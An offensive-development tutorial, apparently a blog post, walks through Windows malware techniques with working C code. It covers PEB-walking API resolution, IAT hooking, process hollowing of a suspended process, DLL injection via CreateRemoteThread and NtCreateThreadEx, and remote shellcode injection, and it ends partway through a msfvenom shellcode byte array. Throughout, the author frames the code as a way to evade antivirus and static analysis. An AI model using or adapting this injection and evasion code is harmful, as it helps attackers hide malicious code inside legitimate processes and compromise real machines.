Table of Contents

1. Static Calls in Malware  
   1.1. PEB Structure  
   1.2. Dynamic Function Loading (IAT Hooking)  

2. Process Injection Techniques
   2.1. Process Hollowing
   - 2.1.1. Creating the Target Process  
   - 2.1.2. Injecting the New Image  
   - 2.1.3. Detecting and Running the Hollowed Process  
   
   2.2. DLL Injection 
   - 2.2.1. Attaching to the Process  
   - 2.2.2. Allocating Memory in the Target Process  
   - 2.2.3. Copying the DLL  
   - 2.2.4. The Starting Point  
   - 2.2.5. Executing the DLL  

3. Shellcode Playbook
   3.1. Process Injection
   3.2. Shellcode Obfuscation  

4. Writing a Simple Rootkit
   4.1. Writing a Windows Device Driver  
   4.2. Kernel-Mode DLL  
   4.3. DLL Injection Methods  
   - 4.3.1. Traditional DLL Injection  
   - 4.3.2. DLL Injection via APC  

This post will focus on offensive development, particularly on code manipulation in malware. We’ll begin by exploring both high-level and low-level approaches. Topics will include dynamically loading functions and working with the Process Environment Block (PEB) to execute code. We’ll also look at obfuscation techniques, like using XOR and AES encryption to make detection more challenging. Methods such as shellcode and DLL injection will be discussed for injecting code. Finally, we’ll cover kernel-level injection with a rootkit twist. Each technique will be explained with code examples and step-by-step instructions.

Will outline the basic requirements and research needed for the project, giving it a rough structure and defining the general goals. Future posts will dive deeper into specifics. If better sources are available to explain certain concepts, I’ll reference them, while also providing thorough documentation of sources and additional info for further research.

For this, you should have some familiarity with the following areas:

That said, I’ll aim to make each topic as clear as possible. If I find better explanations or useful resources, I’ll include links at the end of the article.

Static Function Calls

Alright, Let’s start with the basics, This is about as simple as it gets—just a direct, statically linked call to MessageBoxA. What happens here is straightforward: at compile time, the linker knows exactly where to find MessageBoxA in the Windows library, and it binds the function into the executable. When you run the program, Windows pops up a message box that says, “Foo Here.”

int main(void) {
MessageBoxA(0, "Foo Here.", "info", 0);
return 0;
}

Easy, right? But here’s the catch: this method is extremely predictable. Security tools, like static analysis engines, can easily scan the binary and know you’re calling MessageBoxA. This is great for clarity, but not so great if you’re writing something more complex—say, code that needs to avoid detection.

int main(void) {
size_t get_MessageBoxA = (size_t)GetProcAddress( LoadLibraryA("USER32.dll"), "MessageBoxA" );
def_MessageBoxA msgbox_a = (def_MessageBoxA) get_MessageBoxA;
msgbox_a(0, "Foo Here.", "info", 0);
return 0;
}

Okay, what changed here? Instead of letting the linker handle everything for us, we’re dynamically loading the MessageBoxA function. First, we load the USER32.dll library at runtime using LoadLibraryA. Then, we ask for the address of the MessageBoxA function inside that library using GetProcAddress.

Notice how we’re no longer depending on compile-time linking. The function address isn’t even resolved until the program is already running. This makes it trickier for static analysis tools to detect, since they don’t see a direct call to MessageBoxA in the binary. Instead, the function gets resolved “on the fly” when the program runs.

This technique is widely used in malware to hide behavior from basic detection methods. If a piece of malware doesn’t explicitly reference suspicious functions, it’s harder for security tools to flag it.

Let’s take it a step further now. What if you want to manipulate behavior dynamically perhaps hooking into existing code? Check this out:

__declspec(dllexport) void func01() { MessageBoxA(0, "", "Function 1", 0); }
__declspec(dllexport) void func02() { MessageBoxA(0, "", "Function 2", 0); }

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Hook function func01
    }
    return TRUE;
}

Here, we’ve introduced function hooking inside a DLL. Now, func01 and func02 both display simple message boxes when called. But what’s interesting is what happens in DllMain. When this DLL gets loaded into a process (thanks to DLL_PROCESS_ATTACH), we could hook into func01 and change its behavior at runtime.

So now, instead of just dynamically loading a function like before, we’re dynamically changing how functions behavewhile the program runs. Hooking functions this way is another technique often used by malware or even legitimate applications for debugging or monitoring purposes—to intercept and alter behavior.

So far, we’ve just been working on the surface. But what if you need to go under the hood and start poking around in how Windows manages processes? Enter the PEB (Process Environment Block), a treasure trove of information about running processes.

Creating the process data structures: Windows creates the process structure EPROCESS on kernel land for the newly created calc.exe process, Initialize the virtual memory: Then, Windows creates the process, virtual memory, and its representation of the physical memory and saves it inside the EPROCESS structure, creates the PEB structure with all necessary information, and then loads the main two DLLs that Windows applications will always need, which are ntdll.dll and kernel32.dll and finally loading the PE file and start the execution.

PEB is a data structure in the Windows operating system that contains information and settings related to a running process, The process control block contains data that is only useful to the kernel, such as the preferred CPU for this process. The Thread Control Block is entirely different, and is what the kernel uses to manage threads, which are what the kernel runs at the lowest level.

the PEB is accessed to retrieve information about loaded modules, specifically the base addresses of dynamically linked libraries (DLLs). Let’s explore how the PEB is used in the code:

typedef struct _PEB_LDR_DATA {
ULONG Length;
UCHAR Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA; 

typedef struct _UNICODE_STRING32 {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING32, *PUNICODE_STRING32;

typedef struct _PEB32 {
    // ...
} PEB32, *PPEB32;

typedef struct _PEB_LDR_DATA32 {
    // ...
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;

typedef struct _LDR_DATA_TABLE_ENTRY32 {
    // ...
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;

As you can see, the PEB is a robust structure. The code defines several structures, such as PEB32, PEB_LDR_DATA32, and LDR_DATA_TABLE_ENTRY32, which are simplified versions of the actual PEB data structures. These structures contain fields that hold information about loaded modules and their locations in memory.

size_t GetModHandle(wchar_t *libName) {
PEB32 *pPEB = (PEB32 *)__readfsdword(0x30); // ds: fs[0x30]
PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks

);
printf("current node: %ls\n", data->BaseDllName.Buffer);
if (StrStrIW(libName, data->BaseDllName.Buffer))
return data->DllBase;
}
return 0;
}

The GetModHandle function accesses the PEB to find the base address of a loaded module. The PEB contains a data structure called PEB_LDR_DATA that manages information about loaded modules. The InMemoryOrderModuleList field of this structure is a linked list of loaded modules. The GetModHandle function iterates through this list and compares module names to find the desired module based on the libName parameter.

The PEB can be found at fs:[0x30] in the Thread Environment Block for x86 processes as well as at GS:[0x60] for x64 processes.

Next we call the GetFuncAddrfunction which well be used to locate the address of a specific function within a loaded module. It takes the moduleBase parameter, which is the base address of the module, and it looks into the export table of the module to find the address of the function with the specified name (szFuncName). The export table is part of the module’s data structure, which is managed by the PEB.

size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {

// parse export table
PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

// parse exported function info

PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

The function begins by parsing the export table of the loaded module to access information about its exported functions. The export table is part of the Portable Executable (PE) file format and contains details about functions that can be accessed externally.

  1. accesses the DOS header and the NT header to navigate to the Optional Header of the PE file.
  2. identifies the data directory for exports using the IMAGE_DIRECTORY_ENTRY_EXPORT index from the Optional Header’s data directory array.
  3. calculates the address of the export table, which holds data related to the module’s exported functions.

Next, inside the loop, it compares the current exported function’s name (sz_CurrApiName) with the target function name (szFuncName) using a case-insensitive comparison. When a match is found, the function prints information about the matching function, including its name and ordinal.

// lookup
for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;
if (!stricmp(sz_CurrApiName, szFuncName)) {
printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName); //enumeration process 
return moduleBase + arrFuncs[ num_CurrApiOrdinal - 1 ];
}
}
return 0;
}

If the target function name matches the current function name, the function returns the address of that function. It calculates the function’s address by referencing the arrFuncs array and the ordinal. The ordinal, when converted to an index, helps retrieve the correct address from the array.

Why is This Important this technique is usually how code injection is preformed and yes dynamic function loading, now Let’s take a look at main function.

int main(int argc, char** argv, char* envp) {
    size_t kernelBase = GetModHandle(L"kernel32.dll");
    printf("[+] GetModHandle(kernel32.dll) = %p\n", kernelBase); // result of the `GetModHandle` 
    
    size_t ptr_WinExec = (size_t)GetFuncAddr(kernelBase, "WinExec");
    printf("[+] GetFuncAddr(kernel32.dll, WinExec) = %p\n", ptr_WinExec); // the address of the `WinExec`
    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW); 
    return 0;
}

We calls the GetModHandle function to find the base address of the “kernel32.dll” module in the current process. It uses the PEB to traverse the list of loaded modules and search for the one with the specified name (“kernel32.dll”), Next we calls the GetFuncAddr to locate the address of the WinExec, passes the base address of “kernel32.dll” obtained in the previous step and the function name “WinExec” as arguments and Finally, the code dynamically invokes the WinExec function using the address obtained earlier. It casts the ptr_WinExec to the appropriate function pointer type and calls it with the arguments “calc” (to run the Windows Calculator) and SW_SHOW

Demonstrates how to dynamically locate and execute the WinExec function from the “kernel32.dll” module, effectively opening the Calculator This shows how code manipulation can be achieved by accessing the PEB and locating and using specific functions from loaded modules.

Alright let’s back up a little bit here “Code Injection” Here’s the section to explain and explore further in the context of code injection:

((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);

This line dynamically invokes the WinExec function to open the Windows Calculator. Now, let’s break down what’s happening here:

In essence, what’s occurring here is:

The code dynamically injects the execution of the WinExec function into the context of a legitimate process. Rather than statically linking to the WinExec function, this code locates and invokes it dynamically. Dynamic function loading is a technique often employed in malware to access specific functions without the need for direct imports, making it more evasive.

It’s important to note that in this code example, opening the Windows Calculator is a benign action. However, it serves as an illustrative case of code injection and dynamic function invocation.

This technique is at the heart of many code injection and malware techniques. By dynamically locating and invoking functions, malware can avoid leaving obvious traces, making it harder for security tools to detect what’s going on. The dynamic approach lets attackers modify behavior on the fly, adapt to different environments, and evade static analysis by not embedding suspicious calls directly into the binary.

Dynamic Function Loading (IAT Hooking)

When you call a function like MessageBoxA, which was exported from an external library such as kernel32.dll, it doesn’t make a direct jump to the actual code for the message box. Instead, it goes through what is called the Import Address Table (IAT). IAT is like a phonebook that contains the addresses of functions the program needs to import from libraries outside its own compilation unit.

  1. The application calls MessageBoxA.
  2. Instead of directly jumping to the actual MessageBoxA code, the program looks up the function’s address in the IAT.
  3. The IAT contains a pointer to the real MessageBoxA function in kernel32.dll.
  4. The application jumps to that address and executes the function.

So, whenever a function like MessageBoxA is called, the application checks the IAT for the function’s location. It’s a sort of “indirect calling mechanism.”

Application            IAT                          kernel32.dll
+-------------+     +-------------+              +-----------------+
| call        |     | MessageBoxA |    --->      | MessageBoxA code|
| MessageBoxA +---> + (jmp to addr)+   --->      +-----------------+
+-------------+     +-------------+

First, the target program calls a WinAPI function such as MessageBoxA. The program looks up the address of MessageBoxA in the IAT and does a jump in code execution to the kernel32!MessageBoxA address resolved in IAT where real code for displaying MessageBoxA,

#define getNtHdr(buf) ((IMAGE_NT_HEADERS *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew))
#define getSectionArr(buf) ((IMAGE_SECTION_HEADER *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew + sizeof(IMAGE_NT_HEADERS))

The application code makes a function call to MessageBoxA. This call is typically made using a function or API from a Windows library, When the application code makes a function call, it does not directly call the function’s code. Instead, it looks up the address of the function in the IAT, which contains entries for various imported functions. Once the address of MessageBoxA is resolved in the IAT, the code execution jumps to that resolved address. In this case, the resolved address points to the legitimate kernel32!MessageBoxA function.

size_t ptr_msgboxa = 0;
void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr)
{
    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
    for (; impModuleList->Name; impModuleList++)
    {
        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
        for (int i = 0; arr_apiNames[i].u1.Function; i++)
        {
            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name))
            {
                apiAddr = arr_callVia[i].u1.Function;
                arr_callVia[i].u1.Function = callback;
                break;
            }
        }
    }
}

int main(int argc, char **argv)
{
    void (*ptr)(UINT, LPCSTR, LPCSTR, UINT) = [](UINT hwnd, LPCSTR lpText, LPCSTR lpTitle, UINT uType) {
        printf("[hook] MessageBoxA(%i, \"%s\", \"%s\", %i)", hwnd, lpText, lpTitle, uType);
        ((UINT(*)(UINT, LPCSTR, LPCSTR, UINT))ptr_msgboxa)(hwnd, "msgbox got hooked", "alert", uType);
    };

    iatHook((char *)GetModuleHandle(NULL), "MessageBoxA", (size_t)ptr, ptr_msgboxa);
    MessageBoxA(0, "Hook Test", "title", 0);
    return 0;
}

So What’s Going on Here? Instead of executing the legitimate kernel32!MessageBoxA function, the IAT entry for MessageBoxA is modified to point to a replacement function (the ptr function in the code). As a result, when the application makes a call to MessageBoxA, it actually calls the replacement function, which can alter or extend the behavior of the original function call.

So what have we accomplished here? By modifying the IAT, we’ve redirected the function call to our own custom code. This means you can alter how MessageBoxA behaves or any other API function you want to hook. IAT hooking is neat because it allows you to change the behavior of a program without modifying the original code, just by tampering with the IAT. This can be used for real purposes like debugging or monitoring, but it’s also a technique widely used in malware to hide or change what certain functions do,

In short, IAT hooking lets you insert yourself into the flow of function calls, modifying behavior or collecting information without directly altering the original program’s code. This is dynamic function loading at its core, taking control of how and when certain functions execute.

Process Hollowing

Alright, let’s transition into something cooler and tie everything we’ve learned together, starting with dynamic function loading and IAT hooking. Process hollowing is like taking the techniques we’ve been discussing and pushing them into the realm of complete process takeover.

process hollowing allows you to spawn a legitimate process but take control of it by injecting malicious code. It’s all about leveraging a legitimate-looking process while doing something entirely different underneath.

So, how does process hollowing actually work? It begins with creating a new instance of a legitimate process in a suspended state. Think of it like freezing the process right after it’s created but before it has a chance to do anything. This gives us the perfect opportunity to inject our own code into the process, letting it run under the cover of something legitimate.

To pull off process hollowing, the injected code has to meet certain requirements to ensure everything runs smoothly. The code (or source image) being injected needs to be in PE format (Portable Executable), which is the standard executable format on Windows. It needs executable code that the system can actually run, typically found in the .text section. You also need to know the Address of Entry Point (AEP), which is basically where the injected code starts executing. This address will later guide the process on where to begin executing the new image. Additionally, sections like .data and .rdata need to be properly mapped so that everything works as expected once the hollowing is complete.

Let’s Create the Process

At the core of process hollowing is the ability to create a process in a suspended state, inject new code, and then replace the original image,

if (CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI)) 
{
    // Allocate memory for the context.
    CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
    CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

    // Retrieve the context.
    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
    {
        pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
            NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

        // File Mapping
        WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
        for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
            WriteProcessMemory
            (
                PI.hProcess, 
                LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
                LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
                SectionHeader[i].SizeOfRawData, 
                0
            );
    }
}

This code uses the CreateProcessA function to launch a new process, but with one catch—the CREATE_SUSPENDED flag,

Now that the process is suspended, we grab its context (essentially the state of the process, including registers and memory pointers). We use this context to inject our own code and get the process to execute it. The context helps us set things like the entry point, ensuring that when the process resumes, it runs our code instead of the original executable’s code.

Injecting the New Image

Here comes the tricky part—injecting the new image into the process. We first allocate memory inside the target process using VirtualAllocEx to store our new executable image. Then, we copy over the headers and sections of the PE file (remember, this is the executable we’re injecting).

for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++) {
    WriteProcessMemory(
        PI.hProcess, 
        LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
        LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
        SectionHeader[i].SizeOfRawData, 
        0
    );
}

At this point, we’ve successfully injected the new image. The suspended process is now housing our code, but it’s still paused. To make it run, we need to adjust the process’s entry point to point to the start of our injected code.

Now that the process is loaded with our code, we need to update its execution context so it starts running from the correct point. Here’s where we set the EAX register to point to the address of the entry point (the starting point for execution):

WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&pImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
ResumeThread(PI.hThread);

We update the context so that the instruction pointer (EAX in this case) knows where to begin executing the newly injected code. The process, when resumed, will jump straight into our code as if it were the original.

With ResumeThread, the suspended process is brought back to life, but now it’s running our code instead of the original executable’s.

Detecting and Running the Hollowed Process

This last piece of code checks if the process being run is the target for hollowing. If it detects the right executable, it triggers the hollowing routine. Otherwise, it might just run the normal process:

char CurrentFilePath[MAX_PATH + 1];
GetModuleFileNameA(0, CurrentFilePath, MAX_PATH);
if (strstr(CurrentFilePath, "GoogleUpdate.exe")) {
    MessageBoxA(0, "foo", "", 0);
    return 0;

    LONGLONG len = -1;
    RunPortableExecutable("GoogleUpdate.exe", MapFileToMemory(CurrentFilePath, len));
    return 0;
}

This section ensures that the process hollowing only takes place for a specific target, in this case, "GoogleUpdate.exe". It could display a message box or proceed with injecting the new image. This step is critical in deciding whether to perform the hollowing or let the process run normally.

Process hollowing takes what we’ve learned about dynamic function loading and memory manipulation and dials it up to a full-blown process takeover. By creating a process in a suspended state, injecting new code, and setting the context to start from our injected code, we essentially “hollow out” the legitimate process and replace it with our own execution. The legitimate process acts as a shell, making the injected process harder to detect, especially by static analysis tools.

This technique, like the others we’ve seen, showcases the fine line between low-level Windows programming and the sort of behavior typically seen in malware. It’s all about control taking over a real(legit) process and making it do something entirely different without anyone being the wiser.

DLL injection Techniques

Alright, want somethin’ more cool, Here’s DLL injection which is essentially about sneaking your own code into the memory space of an already running process. The neat part is that this code is in the form of a Dynamic Link Library (DLL), and once you’ve inserted your code, the process will start executing it, making it seem like a part of its normal operations. This technique isn’t just used by malware; it’s also helpful for debugging and other legit stuff. But as you might guess, injecting code into another process requires privileges on the system, especially when you want to manipulate the memory of other programs.

The key to DLL injection is leveraging the Windows API, which provides a suite of functions to interact with processes, manipulate their memory, and ultimately force them to execute your injected code. We can break down the injection process into four core steps:

Attaching to the Process

The first step in injecting a DLL is getting access to the target process. This is done using the OpenProcess() function, which grants us the necessary rights to manipulate the process. We need access rights like;

PROCESS_VM_OPERATION and PROCESS_CREATE_THREAD 

to work with the target’s memory and create new threads inside it.

hHandle = OpenProcess( PROCESS_CREATE_THREAD | 
                       PROCESS_QUERY_INFORMATION | 
                       PROCESS_VM_OPERATION | 
                       PROCESS_VM_WRITE | 
                       PROCESS_VM_READ, 
                       FALSE, 
                       procID );

This handle allows us to interact with the process critical when you’re trying to inject code. Without this access, you’re just knocking on the door with no way in.

Allocating Memory in the Target Process

Next up, we need some space inside the target process’s memory to put our DLL. This is where VirtualAllocEx()comes into play. Depending on your method, you either allocate memory for the DLL path (if using LoadLibraryA()) or the full contents of the DLL itself (if directly jumping to DllMain or some other entry point).

GetFullPathName(TEXT("foo.dll"), 
                BUFSIZE, 
                dllPath, //Output to save the full DLL path
                NULL);

dllPathAddr = VirtualAllocEx(hHandle, 
                             0, 
                             strlen(dllPath), 
                             MEM_RESERVE|MEM_COMMIT, 
                             PAGE_EXECUTE_READWRITE);

The key here is that we’ve reserved space in the target process to store the path to our DLL. This is the address where the DLL’s name will live inside the target’s memory.

Copying the DLL ()

Once we have allocated space, we need to fill that space with either the DLL itself or the path to it, depending on the method. If you’re using the LoadLibraryA() approach, you just copy the path of the DLL into the allocated memory space. For copying, we use WriteProcessMemory().

WriteProcessMemory(hHandle, 
                   dllPathAddr, 
                   dllPath, 
                   strlen(dllPath), 
                   NULL);

If, on the other hand, we are loading the entire DLL into memory, we would first open the DLL file and read its contents into memory before writing it to the target process:

hFile = CreateFileA( dllPath, 
                     GENERIC_READ, 
                     0, 
                     NULL, 
                     OPEN_EXISTING, 
                     FILE_ATTRIBUTE_NORMAL, 
                     NULL );

dllFileLength = GetFileSize(hFile, NULL);

remoteDllAddr = VirtualAllocEx(hProcess, 
                               NULL, 
                               dllFileLength, 
                               MEM_RESERVE|MEM_COMMIT, 
                               PAGE_EXECUTE_READWRITE );

ReadFile(hFile, lpBuffer, dllFileLength, &dwBytesRead, NULL);

WriteProcessMemory(hProcess, remoteDllAddr, lpBuffer, dllFileLength, NULL);

This method gives you more control and avoids some of the downsides of LoadLibraryA(), like the fact that it registers the DLL with the system (which is easier to detect).

The Starting Point

Now that we’ve got our DLL (or DLL path) sitting in the target process’s memory, we need to tell the process where to begin execution. Most of the time, we either execute LoadLibraryA() or jump directly to the DllMain function of the DLL.

If we’re using LoadLibraryA(), we need to get its address using GetProcAddress():

loadLibAddr = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");

hen we pass this address to our execution function, along with the memory address of the DLL path. This tells the target process to load the DLL we’ve injected using its own resources.

Executing the DLL

Now comes the moment of truth—executing the DLL. The most popular way to do this is by creating a new thread in the target process using CreateRemoteThread(). This function allows us to tell the process to start executing at the address of LoadLibraryA() or some other entry point we choose.

rThread = CreateRemoteThread(hTargetProcHandle, NULL, 0, lpStartExecAddr, lpExecParam, 0, NULL);
WaitForSingleObject(rThread, INFINITE);

In this case, we pass in the memory address where we want the process to start execution (lpStartExecAddr) and the parameters we want to pass (in this case, the memory address of the DLL path).

Alternatively, you can use NtCreateThreadEx(), an undocumented function from ntdll.dll. This function is similar to CreateRemoteThread() but sometimes bypasses certain security measures.

struct NtCreateThreadExBuffer {
 ULONG Size;
 ULONG Unknown1;
 ULONG Unknown2;
 PULONG Unknown3;
 ULONG Unknown4;
 ULONG Unknown5;
 ULONG Unknown6;
 PULONG Unknown7;
 ULONG Unknown8;
}; 

LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr;
NTSTATUS status = funNtCreateThreadEx(
    &hRemoteThread;,
    0x1FFFFF,
    NULL,
    hHandle,
    (LPTHREAD_START_ROUTINE)loadLibAddr,
    dllPathAddr,
    FALSE,
    NULL,
    NULL,
    NULL,
    &ntbuffer;
);

This method, though more complex, can be useful when you need to evade detection or when CreateRemoteThread()doesn’t work due to security restrictions.

At this point, we’ve successfully attached to a process, allocated memory in its space, copied over our DLL (or its path), and executed it. Whether you use LoadLibraryA() or jump directly to DllMain, the target process is now running code injected from your DLL. The code might be malicious or could be used for something benign like debugging or monitoring.

DLL injection, just like process hollowing or IAT hooking, is all about gaining control over another process’s execution. Each of these methods has its own strengths and weaknesses, but they all boil down to the same principle: controlling the memory and execution flow of a target process, turning it into something else. In this case, that “something else” is a process now executing code you’ve placed there via your injected DLL.

From here, the options are limitless you could manipulate the behavior of the target process, monitor its activity, or even hijack its resources for own purposes.

The Shellcode Playbook

Alright, let’s put on the red team cap and step right into the world of injections, blending benign code with the more covert, sneaky techniques to carry out our objectives. First, we’ll look at what seems like normal code, break down what’s happening, and then transition toward more advanced, low-level techniques seen out in the wild.

Let’s start with some completely legit looking code that simply spawns a new Notepad process using CreateProcessW. The goal is to get comfortable with how processes are launched in Windows.

int main(void){

    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};

    if(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
)){
        printf("(-) failed to create process, error: %ld", GetLastError());
        return EXIT_FAILURE;
    }

    printf("(+) process started! PID:%ld", pi.dwProcessId);
    return EXIT_SUCCESS;
}

This piece of code is completely benign it’s just spawning a Notepad process with a below normal priority. We’re using CreateProcessW, which is part of the Windows API, to start this new process. Nothing fancy here, just a simple process creation that anyone using the Windows API would do. It’s above board and should raise no alarms, but it’s our starting point.

Now, here’s where things start to get fun.

BOOL CreateProcessW(
  [in, optional]      LPCWSTR               lpApplicationName,
  [in, out, optional] LPWSTR                lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCWSTR               lpCurrentDirectory,
  [in]                LPSTARTUPINFOW        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);

We’re not inventing something entirely new; instead, we’re refining existing code droppers and loaders for Windows targets, making them responsive to our session commands.

Our goal here is to run unrestricted shellcode. Windows API functions: OpenProcess VirtualAllocEx WriteProcessMemory and CreateRemoteThread Each function plays a specific role in enabling the shellcode to do its job. We’re in charge, and the Windows targets should be ready to follow our instructions.

int main()
{
    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};
    
(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
));
  
  char shellcode[] ={
  };

    HANDLE hProcess; 
    HANDLE hThread;
    void*exec_mem;
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pi.dwProcessId);
    exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, exec_mem, shellcode, sizeof(shellcode), NULL);
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL,0,0);
    CloseHandle(hProcess);
    return 0;
}

This code does a bit more than just start Notepad. It spawns the process, grabs a handle to it, allocates some memory inside of it, and writes some shellcode directly into the process’s memory. Then it uses CreateRemoteThread to execute that shellcode. Now we’ve crossed the line from benign to malicious This is basic process injection.

However, plaintext (msf) shellcode tends to raise red flags and is susceptible to detection by AV engines. In the preceding section, If you wanna developing you own x64 shellcode, take a look at this # Windows x64 Shellcode Development

Alright, this code is simpler and can be swiftly pinpointed by av engines. So, let’s explore an alternative play here how about encoding the shellcode into Read-Write-Execute (RWX) memory to initiate Notepad?

Alright, RWX memory implementation is fairly simple for our intended purpose. It involves searching a process’s private virtual memory space (the userland virtual memory space) for a memory section marked as PAGE_EXECUTE_READWRITE. If such a space is found, it’s returned. If not, the next search address is adjusted to the subsequent memory region (BaseAddress + Memory Region).

To finalize this for code execution, our shellcode must then be relocated to that discovered memory region and executed. An efficient way to achieve this is to resort WinAPI calls, similar to what we demonstrated in the first technique,

int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
